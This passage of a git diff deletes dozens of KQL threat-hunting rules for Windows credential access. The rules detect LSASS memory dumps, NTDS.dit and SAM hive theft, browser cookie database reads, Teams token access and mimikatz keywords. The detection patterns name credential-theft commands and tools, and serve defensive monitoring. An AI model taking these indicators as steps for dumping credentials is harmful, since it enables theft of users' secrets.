-| where (ProcessCommandLine contains ".key" or ProcessCommandLine contains ".pgp" or ProcessCommandLine contains ".gpg" or ProcessCommandLine contains ".ppk" or ProcessCommandLine contains ".p12" or ProcessCommandLine contains ".pem" or ProcessCommandLine contains ".pfx" or ProcessCommandLine contains ".cer" or ProcessCommandLine contains ".p7b" or ProcessCommandLine contains ".asc") and ((ProcessCommandLine contains "dir " and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or (ProcessCommandLine contains "Get-ChildItem " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) or (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql b/Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql
deleted file mode 100644
index 3f8a20a2..00000000
--- a/Credential Access/Process_Access_via_TrolleyExpress_Exclusion.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/10
-// Level: high
-// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
-// Tags: attack.defense_evasion, attack.t1218.011, attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall"))))
\ No newline at end of file
diff --git a/Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql b/Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql
deleted file mode 100644
index 2530eb6f..00000000
--- a/Credential Access/Process_Memory_Dump_Via_Comsvcs.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/02/18
-// Level: high
-// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1036, attack.t1003.001, car.2013-05-009
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))
\ No newline at end of file
diff --git a/Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql b/Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql
deleted file mode 100644
index dfd4dc8d..00000000
--- a/Credential Access/Process_Memory_Dump_via_RdrLeakDiag.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/09/24
-// Level: high
-// Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "fullmemdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "-memdmp") and (ProcessCommandLine contains " -o " or ProcessCommandLine contains " /o ") and (ProcessCommandLine contains " -p " or ProcessCommandLine contains " /p ")) or ((FolderPath endswith "\\rdrleakdiag.exe" or ProcessVersionInfoOriginalFileName =~ "RdrLeakDiag.exe") and (ProcessCommandLine contains "fullmemdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "-memdmp"))
\ No newline at end of file
diff --git a/Credential Access/QuarksPwDump_Dump_File.kql b/Credential Access/QuarksPwDump_Dump_File.kql
deleted file mode 100644
index f54a872d..00000000
--- a/Credential Access/QuarksPwDump_Dump_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/02/10
-// Level: critical
-// Description: Detects a dump file written by QuarksPwDump password dumper
-// Tags: attack.credential_access, attack.t1003.002
-DeviceFileEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\SAM-" and FolderPath contains ".dmp"
\ No newline at end of file
diff --git a/Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql b/Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql
deleted file mode 100644
index 630b3df1..00000000
--- a/Credential Access/SQLite_Chromium_Profile_Data_DB_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: TropChaud
-// Date: 2022/12/19
-// Level: high
-// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
-// Tags: attack.credential_access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql b/Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql
deleted file mode 100644
index fbc2f1fc..00000000
--- a/Credential Access/SQLite_Firefox_Profile_Data_DB_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/08
-// Level: high
-// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
-// Tags: attack.credential_access, attack.t1539, attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/Credential Access/SafetyKatz_Default_Dump_Filename.kql b/Credential Access/SafetyKatz_Default_Dump_Filename.kql
deleted file mode 100644
index a2762bbb..00000000
--- a/Credential Access/SafetyKatz_Default_Dump_Filename.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis
-// Date: 2018/07/24
-// Level: high
-// Description: Detects default lsass dump filename from SafetyKatz
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where FolderPath endswith "\\Temp\\debug.bin"
\ No newline at end of file
diff --git a/Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql b/Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql
deleted file mode 100644
index 07998e4b..00000000
--- a/Credential Access/Sensitive_File_Dump_Via_Wbadmin.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2024/05/10
-// Level: high
-// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
-Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
-
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "start" or ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") and (ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit")
\ No newline at end of file
diff --git a/Credential Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql b/Credential Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql
deleted file mode 100644
index b8e893e8..00000000
--- a/Credential Access/Sensitive_File_Recovery_From_Backup_Via_Wbadmin.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2024/05/10
-// Level: high
-// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
-Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
-
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit") and (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql b/Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql
deleted file mode 100644
index e9be73a7..00000000
--- a/Credential Access/Shadow_Copies_Creation_Using_Operating_Systems_Utilities.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/22
-// Level: medium
-// Description: Shadow Copies creation using operating systems utilities, possible credential access
-// Tags: attack.credential_access, attack.t1003, attack.t1003.002, attack.t1003.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "shadow" and ProcessCommandLine contains "create") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE")))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql b/Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql
deleted file mode 100644
index 9babcb21..00000000
--- a/Credential Access/Suspicious_Active_Directory_Database_Snapshot_Via_ADExplorer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: high
-// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory.
-// Tags: attack.credential_access, attack.t1552.001, attack.t1003.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "snapshot" and (FolderPath endswith "\\ADExplorer.exe" or ProcessVersionInfoOriginalFileName =~ "AdExp") and (ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Dump64.exe_Execution.kql b/Credential Access/Suspicious_Dump64.exe_Execution.kql
deleted file mode 100644
index 0f7d9a83..00000000
--- a/Credential Access/Suspicious_Dump64.exe_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger, Florian Roth
-// Date: 2021/11/26
-// Level: high
-// Description: Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\dump64.exe" and (not(FolderPath contains "\\Installer\\Feedback\\dump64.exe"))) or (FolderPath endswith "\\dump64.exe" and (ProcessCommandLine contains " -ma " or ProcessCommandLine contains "accepteula"))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_File_Event_With_Teams_Objects.kql b/Credential Access/Suspicious_File_Event_With_Teams_Objects.kql
deleted file mode 100644
index 564a514a..00000000
--- a/Credential Access/Suspicious_File_Event_With_Teams_Objects.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @SerkinValery
-// Date: 2022/09/16
-// Level: high
-// Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
-// Tags: attack.credential_access, attack.t1528
-DeviceFileEvents
-| where (FolderPath contains "\\Microsoft\\Teams\\Cookies" or FolderPath contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Key_Manager_Access.kql b/Credential Access/Suspicious_Key_Manager_Access.kql
deleted file mode 100644
index 4ccbd4ac..00000000
--- a/Credential Access/Suspicious_Key_Manager_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/21
-// Level: high
-// Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
-// Tags: attack.credential_access, attack.t1555.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "keymgr" and ProcessCommandLine contains "KRShowKeyMgr") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql b/Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql
deleted file mode 100644
index df06d4d8..00000000
--- a/Credential Access/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Elastic (idea), Tobias Michalski (Nextron Systems)
-// Date: 2022/05/04
-// Level: high
-// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
-// Tags: attack.privilege_escalation, attack.credential_access, attack.t1212
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql b/Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql
deleted file mode 100644
index 230502e3..00000000
--- a/Credential Access/Suspicious_Office_Token_Search_Via_CLI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.
-// Tags: attack.credential_access, attack.t1528
-DeviceProcessEvents
-| where ProcessCommandLine contains "eyJ0eXAiOi" or ProcessCommandLine contains " eyJ0eX" or ProcessCommandLine contains " \"eyJ0eX\"" or ProcessCommandLine contains " 'eyJ0eX'"
\ No newline at end of file
diff --git a/Credential Access/Suspicious_PFX_File_Creation.kql b/Credential Access/Suspicious_PFX_File_Creation.kql
deleted file mode 100644
index 882b9d15..00000000
--- a/Credential Access/Suspicious_PFX_File_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.
-// Tags: attack.credential_access, attack.t1552.004
-DeviceFileEvents
-| where FolderPath endswith ".pfx" and (not((FolderPath contains "\\Templates\\Windows\\Windows_TemporaryKey.pfx" and FolderPath contains "\\CMake\\")))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql b/Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql
deleted file mode 100644
index 88ae7640..00000000
--- a/Credential Access/Suspicious_Process_Patterns_NTDS.DIT_Exfil.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/11
-// Level: high
-// Description: Detects suspicious process patterns used in NTDS.DIT exfiltration
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "ac i ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "/c copy " and ProcessCommandLine contains "\\windows\\ntds\\ntds.dit") or (ProcessCommandLine contains "activate instance ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "ntds.dit") or ((FolderPath endswith "\\NTDSDump.exe" or FolderPath endswith "\\NTDSDumpEx.exe") or (ProcessCommandLine contains "ntds.dit" and ProcessCommandLine contains "system.hiv") or ProcessCommandLine contains "NTDSgrab.ps1")) or (((InitiatingProcessFolderPath contains "\\apache" or InitiatingProcessFolderPath contains "\\tomcat" or InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\") or (FolderPath contains "\\apache" or FolderPath contains "\\tomcat" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Public\\" or FolderPath contains "\\PerfLogs\\")) and ProcessCommandLine contains "ntds.dit")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Reg_Add_Open_Command.kql b/Credential Access/Suspicious_Reg_Add_Open_Command.kql
deleted file mode 100644
index 9ff5ebd0..00000000
--- a/Credential Access/Suspicious_Reg_Add_Open_Command.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/20
-// Level: medium
-// Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/ve " and ProcessCommandLine contains "/d") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "DelegateExecute") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings")
\ No newline at end of file
diff --git a/Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql b/Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql
deleted file mode 100644
index 76673450..00000000
--- a/Credential Access/Suspicious_SYSTEM_User_Process_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
-// Tags: attack.credential_access, attack.defense_evasion, attack.privilege_escalation, attack.t1134, attack.t1003, attack.t1027
-DeviceProcessEvents
-| where ((ProcessIntegrityLevel =~ "System" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\ping.exe") or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" 
or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "net user "))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or ProcessCommandLine =~ "ping 127.0.0.1 -n 5" or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd"))))
\ No newline at end of file
diff --git a/Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql b/Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql
deleted file mode 100644
index 5733d349..00000000
--- a/Credential Access/Suspicious_SYSVOL_Domain_Group_Policy_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2018/04/09
-// Level: medium
-// Description: Detects Access to Domain Group Policies stored in SYSVOL
-// Tags: attack.credential_access, attack.t1552.006
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\SYSVOL\\" and ProcessCommandLine contains "\\policies\\"
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Serv-U_Process_Pattern.kql b/Credential Access/Suspicious_Serv-U_Process_Pattern.kql
deleted file mode 100644
index 2f0ddfb0..00000000
--- a/Credential Access/Suspicious_Serv-U_Process_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/14
-// Level: high
-// Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
-// Tags: attack.credential_access, attack.t1555, cve.2021.35211
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe") and InitiatingProcessFolderPath endswith "\\Serv-U.exe"
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Unattend.xml_File_Access.kql b/Credential Access/Suspicious_Unattend.xml_File_Access.kql
deleted file mode 100644
index 4f10fd22..00000000
--- a/Credential Access/Suspicious_Unattend.xml_File_Access.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/19
-// Level: medium
-// Description: Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
-If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process
-
-// Tags: attack.credential_access, attack.t1552.001
-DeviceFileEvents
-| where FolderPath endswith "\\unattend.xml"
\ No newline at end of file
diff --git a/Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql b/Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql
deleted file mode 100644
index 2de6740e..00000000
--- a/Credential Access/Suspicious_Usage_Of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/14
-// Level: medium
-// Description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "snapshot" and ProcessCommandLine contains "mount ") or (ProcessCommandLine contains "ac" and ProcessCommandLine contains " i" and ProcessCommandLine contains " ntds")) and (FolderPath endswith "\\ntdsutil.exe" or ProcessVersionInfoOriginalFileName =~ "ntdsutil.exe")
\ No newline at end of file
diff --git a/Credential Access/Time_Travel_Debugging_Utility_Usage.kql b/Credential Access/Time_Travel_Debugging_Utility_Usage.kql
deleted file mode 100644
index 676604a5..00000000
--- a/Credential Access/Time_Travel_Debugging_Utility_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\tttracer.exe"
\ No newline at end of file
diff --git a/Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql b/Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql
deleted file mode 100644
index 856e72cb..00000000
--- a/Credential Access/Time_Travel_Debugging_Utility_Usage_-_Image.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll"
\ No newline at end of file
diff --git a/Credential Access/Typical_HiveNightmare_SAM_File_Export.kql b/Credential Access/Typical_HiveNightmare_SAM_File_Export.kql
deleted file mode 100644
index a1ad103b..00000000
--- a/Credential Access/Typical_HiveNightmare_SAM_File_Export.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/23
-// Level: high
-// Description: Detects files written by the different tools that exploit HiveNightmare
-// Tags: attack.credential_access, attack.t1552.001, cve.2021.36934
-DeviceFileEvents
-| where (FolderPath contains "\\hive_sam_" or FolderPath contains "\\SAM-2021-" or FolderPath contains "\\SAM-2022-" or FolderPath contains "\\SAM-2023-" or FolderPath contains "\\SAM-haxx" or FolderPath contains "\\Sam.save") or FolderPath =~ "C:\\windows\\temp\\sam"
\ No newline at end of file
diff --git a/Credential Access/Uncommon_Outbound_Kerberos_Connection.kql b/Credential Access/Uncommon_Outbound_Kerberos_Connection.kql
deleted file mode 100644
index 959bf177..00000000
--- a/Credential Access/Uncommon_Outbound_Kerberos_Connection.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Ilyas Ochkov, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
-
-// Tags: attack.credential_access, attack.t1558, attack.lateral_movement, attack.t1550.003
-DeviceNetworkEvents
-| where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe")))
\ No newline at end of file
diff --git a/Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql b/Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql
deleted file mode 100644
index 28c58e45..00000000
